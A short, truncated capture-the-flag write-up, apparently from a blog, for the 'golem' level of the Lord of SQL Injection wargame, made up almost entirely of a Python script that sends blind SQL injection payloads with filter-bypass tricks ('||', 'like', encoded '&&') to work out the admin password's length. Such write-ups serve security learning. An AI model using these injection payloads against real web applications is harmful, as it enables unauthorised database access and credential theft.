Web Hacking/LOS
Lord of SQL Injection(LOS) - golem
import requests requests.packages.urllib3.disable_warnings() org_url = "https://los.rubiya.kr/chall/golem_4b5202cfedd8160e73124b5234235ef5.php" header = {'Cookie': 'PHPSESSID='} session = requests.session() # Check Length of PW for i in range(0, 100): payload = "?pw=ABCD' || id like 'admin' %26%26 length(pw) like " + "'" + str(i) res = session.get(url = org_url + payload, headers=header, verify=..
